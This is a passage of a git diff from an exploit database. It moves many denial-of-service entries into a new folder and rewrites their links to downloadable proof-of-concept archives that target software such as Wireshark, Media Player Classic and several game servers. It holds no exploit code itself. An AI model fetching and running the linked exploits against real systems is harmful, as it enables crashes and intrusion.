platforms/multiple/dos/30528.txt rename to exploits/multiple/dos/30528.txt diff --git a/platforms/multiple/dos/30529.txt b/exploits/multiple/dos/30529.txt similarity index 93% rename from platforms/multiple/dos/30529.txt rename to exploits/multiple/dos/30529.txt index 3c9b5b70f..2e57dd971 100644 --- a/platforms/multiple/dos/30529.txt +++ b/exploits/multiple/dos/30529.txt @@ -8,4 +8,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30529.fli \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30529.fli \ No newline at end of file diff --git a/platforms/multiple/dos/30540.txt b/exploits/multiple/dos/30540.txt similarity index 91% rename from platforms/multiple/dos/30540.txt rename to exploits/multiple/dos/30540.txt index 19c8d7905..c4b25caea 100644 --- a/platforms/multiple/dos/30540.txt +++ b/exploits/multiple/dos/30540.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv This issue affects StarCraft Brood War 1.15.1; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30540.scm \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30540.scm \ No newline at end of file diff --git a/platforms/multiple/dos/30566.txt b/exploits/multiple/dos/30566.txt similarity index 92% rename from platforms/multiple/dos/30566.txt rename to exploits/multiple/dos/30566.txt index 2289b627a..c67db6acd 100644 --- a/platforms/multiple/dos/30566.txt +++ b/exploits/multiple/dos/30566.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary Alien Arena 2007 6.10 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30566.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30566.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30574.txt b/exploits/multiple/dos/30574.txt similarity index 92% rename from platforms/multiple/dos/30574.txt rename to exploits/multiple/dos/30574.txt index 76152e841..df6c65cd4 100644 --- a/platforms/multiple/dos/30574.txt +++ b/exploits/multiple/dos/30574.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary CellFactor: Revolution 1.03 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30574.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30574.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30592.py b/exploits/multiple/dos/30592.py similarity index 100% rename from platforms/multiple/dos/30592.py rename to exploits/multiple/dos/30592.py diff --git a/platforms/multiple/dos/30644.txt b/exploits/multiple/dos/30644.txt similarity index 100% rename from platforms/multiple/dos/30644.txt rename to exploits/multiple/dos/30644.txt diff --git a/platforms/multiple/dos/30702.html b/exploits/multiple/dos/30702.html similarity index 100% rename from platforms/multiple/dos/30702.html rename to exploits/multiple/dos/30702.html diff --git a/platforms/multiple/dos/30713.html b/exploits/multiple/dos/30713.html similarity index 100% rename from platforms/multiple/dos/30713.html rename to exploits/multiple/dos/30713.html diff --git a/platforms/multiple/dos/30779.txt b/exploits/multiple/dos/30779.txt similarity index 92% rename from platforms/multiple/dos/30779.txt rename to exploits/multiple/dos/30779.txt index 0933d8a2d..81c16733f 100644 --- a/platforms/multiple/dos/30779.txt +++ b/exploits/multiple/dos/30779.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to execute arbitrary code within the contex This issue affects Rigs of Rods 0.33d and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30779.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30779.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30791.txt b/exploits/multiple/dos/30791.txt similarity index 90% rename from platforms/multiple/dos/30791.txt rename to exploits/multiple/dos/30791.txt index 32d3d62a2..a8bd1a059 100644 --- a/platforms/multiple/dos/30791.txt +++ b/exploits/multiple/dos/30791.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to cause a remote denial-of-service condit These issues affect versions prior to I Hear U 0.5.7. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30791.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30791.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30814.txt b/exploits/multiple/dos/30814.txt similarity index 100% rename from platforms/multiple/dos/30814.txt rename to exploits/multiple/dos/30814.txt diff --git a/platforms/multiple/dos/30856.txt b/exploits/multiple/dos/30856.txt similarity index 92% rename from platforms/multiple/dos/30856.txt rename to exploits/multiple/dos/30856.txt index 483939fb5..1806e6cf7 100644 --- a/platforms/multiple/dos/30856.txt +++ b/exploits/multiple/dos/30856.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to upload files to Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30856.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30856.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30885.txt b/exploits/multiple/dos/30885.txt similarity index 100% rename from platforms/multiple/dos/30885.txt rename to exploits/multiple/dos/30885.txt diff --git a/platforms/multiple/dos/30896.txt b/exploits/multiple/dos/30896.txt similarity index 100% rename from platforms/multiple/dos/30896.txt rename to exploits/multiple/dos/30896.txt diff --git a/platforms/multiple/dos/30903.c b/exploits/multiple/dos/30903.c similarity index 100% rename from platforms/multiple/dos/30903.c rename to exploits/multiple/dos/30903.c diff --git a/platforms/multiple/dos/30906.c b/exploits/multiple/dos/30906.c similarity index 100% rename from platforms/multiple/dos/30906.c rename to exploits/multiple/dos/30906.c diff --git a/platforms/multiple/dos/30922.c b/exploits/multiple/dos/30922.c similarity index 100% rename from platforms/multiple/dos/30922.c rename to exploits/multiple/dos/30922.c diff --git a/platforms/multiple/dos/30943.txt b/exploits/multiple/dos/30943.txt similarity index 92% rename from platforms/multiple/dos/30943.txt rename to exploits/multiple/dos/30943.txt index 1e93cde13..d4b9267b0 100644 --- a/platforms/multiple/dos/30943.txt +++ b/exploits/multiple/dos/30943.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code in the context of a Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30943.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30943.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30974.txt b/exploits/multiple/dos/30974.txt similarity index 100% rename from platforms/multiple/dos/30974.txt rename to exploits/multiple/dos/30974.txt diff --git a/platforms/multiple/dos/30989.txt b/exploits/multiple/dos/30989.txt similarity index 92% rename from platforms/multiple/dos/30989.txt rename to exploits/multiple/dos/30989.txt index 0dc66f020..84c9185ee 100644 --- a/platforms/multiple/dos/30989.txt +++ b/exploits/multiple/dos/30989.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to exhaust the maximum number of connections al FortressSSH 5.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30989.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30989.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30990.txt b/exploits/multiple/dos/30990.txt similarity index 85% rename from platforms/multiple/dos/30990.txt rename to exploits/multiple/dos/30990.txt index d79a3b3a7..fd281dd36 100644 --- a/platforms/multiple/dos/30990.txt +++ b/exploits/multiple/dos/30990.txt @@ -6,5 +6,5 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30990-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30990-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30990-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30990-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30991.txt b/exploits/multiple/dos/30991.txt similarity index 91% rename from platforms/multiple/dos/30991.txt rename to exploits/multiple/dos/30991.txt index 1dea2023d..031a0259e 100644 --- a/platforms/multiple/dos/30991.txt +++ b/exploits/multiple/dos/30991.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to terminate the server and cause denial-of-se This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30991.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30991.zip \ No newline at end of file diff --git a/platforms/multiple/dos/3101.py b/exploits/multiple/dos/3101.py similarity index 100% rename from platforms/multiple/dos/3101.py rename to exploits/multiple/dos/3101.py diff --git a/platforms/multiple/dos/31100.txt b/exploits/multiple/dos/31100.txt similarity index 100% rename from platforms/multiple/dos/31100.txt rename to exploits/multiple/dos/31100.txt diff --git a/platforms/multiple/dos/31128.txt b/exploits/multiple/dos/31128.txt similarity index 100% rename from platforms/multiple/dos/31128.txt rename to exploits/multiple/dos/31128.txt diff --git a/platforms/multiple/dos/31136.txt b/exploits/multiple/dos/31136.txt similarity index 95% rename from platforms/multiple/dos/31136.txt rename to exploits/multiple/dos/31136.txt index 2416506e4..104fe7100 100644 --- a/platforms/multiple/dos/31136.txt +++ b/exploits/multiple/dos/31136.txt @@ -15,4 +15,4 @@ cyanPrintIP Workstation 4.10.836 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31136.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31136.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31148.txt b/exploits/multiple/dos/31148.txt similarity index 93% rename from platforms/multiple/dos/31148.txt rename to exploits/multiple/dos/31148.txt index cc4f460b0..0787f58ec 100644 --- a/platforms/multiple/dos/31148.txt +++ b/exploits/multiple/dos/31148.txt @@ -13,4 +13,4 @@ cyanPrintIP Workstation 4.10.936 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31148.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31148.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31150.txt b/exploits/multiple/dos/31150.txt similarity index 91% rename from platforms/multiple/dos/31150.txt rename to exploits/multiple/dos/31150.txt index 804a9e590..935fb5ed6 100644 --- a/platforms/multiple/dos/31150.txt +++ b/exploits/multiple/dos/31150.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code or cause denial-of- The issue affects RPM Elite and Select 4.5.1.11 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31150.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31150.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31203.txt b/exploits/multiple/dos/31203.txt similarity index 100% rename from platforms/multiple/dos/31203.txt rename to exploits/multiple/dos/31203.txt diff --git a/platforms/multiple/dos/31223.txt b/exploits/multiple/dos/31223.txt similarity index 100% rename from platforms/multiple/dos/31223.txt rename to exploits/multiple/dos/31223.txt diff --git a/platforms/multiple/dos/31232.txt b/exploits/multiple/dos/31232.txt similarity index 91% rename from platforms/multiple/dos/31232.txt rename to exploits/multiple/dos/31232.txt index 8dbc44ded..c2a775b9a 100644 --- a/platforms/multiple/dos/31232.txt +++ b/exploits/multiple/dos/31232.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow remote attackers to execute arbitra This issue affects WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31232.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31232.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31271.txt b/exploits/multiple/dos/31271.txt similarity index 92% rename from platforms/multiple/dos/31271.txt rename to exploits/multiple/dos/31271.txt index 2ed189051..656229632 100644 --- a/platforms/multiple/dos/31271.txt +++ b/exploits/multiple/dos/31271.txt @@ -6,4 +6,4 @@ A successful exploit will allow remote attackers to execute arbitrary code in th These issues affect MobiLink 10.0.1.3629; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31271.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31271.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31285.txt b/exploits/multiple/dos/31285.txt similarity index 92% rename from platforms/multiple/dos/31285.txt rename to exploits/multiple/dos/31285.txt index 2c570cf23..dd7c69b17 100644 --- a/platforms/multiple/dos/31285.txt +++ b/exploits/multiple/dos/31285.txt @@ -6,4 +6,4 @@ A successful exploit may allow remote attackers to execute arbitrary code in the These issues affect ZIM Server 2.0 and 2.1; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31285.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31285.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31327.txt b/exploits/multiple/dos/31327.txt similarity index 91% rename from platforms/multiple/dos/31327.txt rename to exploits/multiple/dos/31327.txt index bcbca5c2c..8fc6f1119 100644 --- a/platforms/multiple/dos/31327.txt +++ b/exploits/multiple/dos/31327.txt @@ -8,5 +8,5 @@ NOTE: The StarTeam MPX vulnerabilities may actually be related to a TIBCO SmartS Borland StarTeam Server 2008 and MPX products are vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31327-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31327-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31327-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31327-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31343.txt b/exploits/multiple/dos/31343.txt similarity index 94% rename from platforms/multiple/dos/31343.txt rename to exploits/multiple/dos/31343.txt index 6f80a27be..88f0eb4b3 100644 --- a/platforms/multiple/dos/31343.txt +++ b/exploits/multiple/dos/31343.txt @@ -13,4 +13,4 @@ SDK and JRE prior to 1.3.1_22 This vulnerability was previously covered in BID 28083 (Sun Java SE Multiple Security Vulnerabilities), but has been given its own record to better document the issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31343.jpg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31343.jpg \ No newline at end of file diff --git a/platforms/multiple/dos/31376.txt b/exploits/multiple/dos/31376.txt similarity index 100% rename from platforms/multiple/dos/31376.txt rename to exploits/multiple/dos/31376.txt diff --git a/platforms/multiple/dos/31378.txt b/exploits/multiple/dos/31378.txt similarity index 100% rename from platforms/multiple/dos/31378.txt rename to exploits/multiple/dos/31378.txt diff --git a/platforms/multiple/dos/31429.py b/exploits/multiple/dos/31429.py similarity index 100% rename from platforms/multiple/dos/31429.py rename to exploits/multiple/dos/31429.py diff --git a/platforms/multiple/dos/31542.txt b/exploits/multiple/dos/31542.txt similarity index 90% rename from platforms/multiple/dos/31542.txt rename to exploits/multiple/dos/31542.txt index be2e79626..9a7dedec5 100644 --- a/platforms/multiple/dos/31542.txt +++ b/exploits/multiple/dos/31542.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code or to deny service solidDB 06.00.1018 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31542.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31542.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31615.rb b/exploits/multiple/dos/31615.rb similarity index 100% rename from platforms/multiple/dos/31615.rb rename to exploits/multiple/dos/31615.rb diff --git a/platforms/multiple/dos/31728.txt b/exploits/multiple/dos/31728.txt similarity index 85% rename from platforms/multiple/dos/31728.txt rename to exploits/multiple/dos/31728.txt index 175cec56a..08b4351db 100644 --- a/platforms/multiple/dos/31728.txt +++ b/exploits/multiple/dos/31728.txt @@ -6,6 +6,6 @@ An attacker can exploit this issue to crash the affected application, denying se Call of Duty 4 1.5 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31728-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31728-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31728-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31728-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31785.txt b/exploits/multiple/dos/31785.txt similarity index 100% rename from platforms/multiple/dos/31785.txt rename to exploits/multiple/dos/31785.txt diff --git a/platforms/multiple/dos/31817.html b/exploits/multiple/dos/31817.html similarity index 100% rename from platforms/multiple/dos/31817.html rename to exploits/multiple/dos/31817.html diff --git a/platforms/multiple/dos/31872.py b/exploits/multiple/dos/31872.py similarity index 100% rename from platforms/multiple/dos/31872.py rename to exploits/multiple/dos/31872.py diff --git a/platforms/multiple/dos/31919.c b/exploits/multiple/dos/31919.c similarity index 100% rename from platforms/multiple/dos/31919.c rename to exploits/multiple/dos/31919.c diff --git a/platforms/multiple/dos/31931.txt b/exploits/multiple/dos/31931.txt similarity index 100% rename from platforms/multiple/dos/31931.txt rename to exploits/multiple/dos/31931.txt diff --git a/platforms/multiple/dos/31932.txt b/exploits/multiple/dos/31932.txt similarity index 88% rename from platforms/multiple/dos/31932.txt rename to exploits/multiple/dos/31932.txt index 0795bc323..68e82494c 100644 --- a/platforms/multiple/dos/31932.txt +++ b/exploits/multiple/dos/31932.txt @@ -6,4 +6,4 @@ A successful attack will deny service to legitimate users. Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31932.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31932.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31957.txt b/exploits/multiple/dos/31957.txt similarity index 91% rename from platforms/multiple/dos/31957.txt rename to exploits/multiple/dos/31957.txt index ccdab49e2..d3c4ca1f1 100644 --- a/platforms/multiple/dos/31957.txt +++ b/exploits/multiple/dos/31957.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects World in Conflict 1.008; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31957.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31957.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31958.txt b/exploits/multiple/dos/31958.txt similarity index 89% rename from platforms/multiple/dos/31958.txt rename to exploits/multiple/dos/31958.txt index 7528598c7..f1a86ae5c 100644 --- a/platforms/multiple/dos/31958.txt +++ b/exploits/multiple/dos/31958.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash affected g SunAge 1.08.1 is vulnerable; previous versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31958.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31958.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31998.txt b/exploits/multiple/dos/31998.txt similarity index 92% rename from platforms/multiple/dos/31998.txt rename to exploits/multiple/dos/31998.txt index c3caeccbd..2f5731f50 100644 --- a/platforms/multiple/dos/31998.txt +++ b/exploits/multiple/dos/31998.txt @@ -10,4 +10,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31998.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31998.zip \ No newline at end of file diff --git a/platforms/multiple/dos/31999.txt b/exploits/multiple/dos/31999.txt similarity index 100% rename from platforms/multiple/dos/31999.txt rename to exploits/multiple/dos/31999.txt diff --git a/platforms/multiple/dos/32006.txt b/exploits/multiple/dos/32006.txt similarity index 85% rename from platforms/multiple/dos/32006.txt rename to exploits/multiple/dos/32006.txt index 7fb527c30..3b4b6f84d 100644 --- a/platforms/multiple/dos/32006.txt +++ b/exploits/multiple/dos/32006.txt @@ -6,6 +6,6 @@ Exploiting these issues may allow attackers to obtain potentially sensitive info These issues affect Wireshark 0.9.5 up to and including 1.0.0. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32006-1.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32006-2.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32006-3.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-1.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-2.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-3.pcap \ No newline at end of file diff --git a/platforms/multiple/dos/32086.c b/exploits/multiple/dos/32086.c similarity index 100% rename from platforms/multiple/dos/32086.c rename to exploits/multiple/dos/32086.c diff --git a/platforms/multiple/dos/32104.txt b/exploits/multiple/dos/32104.txt similarity index 90% rename from platforms/multiple/dos/32104.txt rename to exploits/multiple/dos/32104.txt index 47c6bd18b..f7dfd60b4 100644 --- a/platforms/multiple/dos/32104.txt +++ b/exploits/multiple/dos/32104.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects ZDaemon 1.08.07 and earlier versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32104.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32104.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32125.txt b/exploits/multiple/dos/32125.txt similarity index 91% rename from platforms/multiple/dos/32125.txt rename to exploits/multiple/dos/32125.txt index f6f6e0170..36c24dab7 100644 --- a/platforms/multiple/dos/32125.txt +++ b/exploits/multiple/dos/32125.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects Unreal Tournament 2004 v3369 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32125.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32125.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32127.txt b/exploits/multiple/dos/32127.txt similarity index 91% rename from platforms/multiple/dos/32127.txt rename to exploits/multiple/dos/32127.txt index 061d4bbf3..530f1bc75 100644 --- a/platforms/multiple/dos/32127.txt +++ b/exploits/multiple/dos/32127.txt @@ -9,4 +9,4 @@ These issues affect the following versions: Unreal Tournament 3 1.3beta4 Unreal Tournament 3 1.2 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32127.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32127.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32192.txt b/exploits/multiple/dos/32192.txt similarity index 86% rename from platforms/multiple/dos/32192.txt rename to exploits/multiple/dos/32192.txt index 0f836bc18..4a7afdcf5 100644 --- a/platforms/multiple/dos/32192.txt +++ b/exploits/multiple/dos/32192.txt @@ -6,5 +6,5 @@ An attacker may exploit these issues to crash the affected application, denying Halo: Combat Evolved 1.0.7.0615 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32192-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32192-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32192-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32192-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32193.txt b/exploits/multiple/dos/32193.txt similarity index 100% rename from platforms/multiple/dos/32193.txt rename to exploits/multiple/dos/32193.txt diff --git a/platforms/multiple/dos/32194.txt b/exploits/multiple/dos/32194.txt similarity index 100% rename from platforms/multiple/dos/32194.txt rename to exploits/multiple/dos/32194.txt diff --git a/platforms/multiple/dos/32195.txt b/exploits/multiple/dos/32195.txt similarity index 100% rename from platforms/multiple/dos/32195.txt rename to exploits/multiple/dos/32195.txt diff --git a/platforms/multiple/dos/32208.txt b/exploits/multiple/dos/32208.txt similarity index 100% rename from platforms/multiple/dos/32208.txt rename to exploits/multiple/dos/32208.txt diff --git a/platforms/multiple/dos/32222.rb b/exploits/multiple/dos/32222.rb similarity index 100% rename from platforms/multiple/dos/32222.rb rename to exploits/multiple/dos/32222.rb diff --git a/platforms/multiple/dos/32310.txt b/exploits/multiple/dos/32310.txt similarity index 100% rename from platforms/multiple/dos/32310.txt rename to exploits/multiple/dos/32310.txt diff --git a/platforms/multiple/dos/32311.html b/exploits/multiple/dos/32311.html similarity index 100% rename from platforms/multiple/dos/32311.html rename to exploits/multiple/dos/32311.html diff --git a/platforms/multiple/dos/32335.js b/exploits/multiple/dos/32335.js similarity index 100% rename from platforms/multiple/dos/32335.js rename to exploits/multiple/dos/32335.js diff --git a/platforms/multiple/dos/32362.txt b/exploits/multiple/dos/32362.txt similarity index 90% rename from platforms/multiple/dos/32362.txt rename to exploits/multiple/dos/32362.txt index 8c1b514d7..1a5f32d47 100644 --- a/platforms/multiple/dos/32362.txt +++ b/exploits/multiple/dos/32362.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash applications that use the vulnerab This issue affects Unreal Engine 3; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32362.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32362.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32381.js b/exploits/multiple/dos/32381.js similarity index 100% rename from platforms/multiple/dos/32381.js rename to exploits/multiple/dos/32381.js diff --git a/platforms/multiple/dos/32386.txt b/exploits/multiple/dos/32386.txt similarity index 91% rename from platforms/multiple/dos/32386.txt rename to exploits/multiple/dos/32386.txt index 6522a8df1..f60eb23bf 100644 --- a/platforms/multiple/dos/32386.txt +++ b/exploits/multiple/dos/32386.txt @@ -15,4 +15,4 @@ WarPath Postal 2 Shadow Ops -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32386.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32386.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32400.html b/exploits/multiple/dos/32400.html similarity index 100% rename from platforms/multiple/dos/32400.html rename to exploits/multiple/dos/32400.html diff --git a/platforms/multiple/dos/32519.txt b/exploits/multiple/dos/32519.txt similarity index 100% rename from platforms/multiple/dos/32519.txt rename to exploits/multiple/dos/32519.txt diff --git a/platforms/multiple/dos/32581.txt b/exploits/multiple/dos/32581.txt similarity index 100% rename from platforms/multiple/dos/32581.txt rename to exploits/multiple/dos/32581.txt diff --git a/platforms/multiple/dos/32596.txt b/exploits/multiple/dos/32596.txt similarity index 100% rename from platforms/multiple/dos/32596.txt rename to exploits/multiple/dos/32596.txt diff --git a/platforms/multiple/dos/32712.txt b/exploits/multiple/dos/32712.txt similarity index 100% rename from platforms/multiple/dos/32712.txt rename to exploits/multiple/dos/32712.txt diff --git a/platforms/multiple/dos/32774.txt b/exploits/multiple/dos/32774.txt similarity index 100% rename from platforms/multiple/dos/32774.txt rename to exploits/multiple/dos/32774.txt diff --git a/platforms/multiple/dos/32836.html b/exploits/multiple/dos/32836.html similarity index 100% rename from platforms/multiple/dos/32836.html rename to exploits/multiple/dos/32836.html diff --git a/platforms/multiple/dos/32865.py b/exploits/multiple/dos/32865.py similarity index 100% rename from platforms/multiple/dos/32865.py rename to exploits/multiple/dos/32865.py diff --git a/platforms/multiple/dos/32949.txt b/exploits/multiple/dos/32949.txt similarity index 100% rename from platforms/multiple/dos/32949.txt rename to exploits/multiple/dos/32949.txt diff --git a/platforms/multiple/dos/33037.html b/exploits/multiple/dos/33037.html similarity index 100% rename from platforms/multiple/dos/33037.html rename to exploits/multiple/dos/33037.html diff --git a/platforms/multiple/dos/33058.txt b/exploits/multiple/dos/33058.txt similarity index 100% rename from platforms/multiple/dos/33058.txt rename to exploits/multiple/dos/33058.txt diff --git a/platforms/multiple/dos/33080.txt b/exploits/multiple/dos/33080.txt similarity index 92% rename from platforms/multiple/dos/33080.txt rename to exploits/multiple/dos/33080.txt index 0d5947391..f2f5c287d 100644 --- a/platforms/multiple/dos/33080.txt +++ b/exploits/multiple/dos/33080.txt @@ -6,4 +6,4 @@ The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker d Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33080.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33080.zip \ No newline 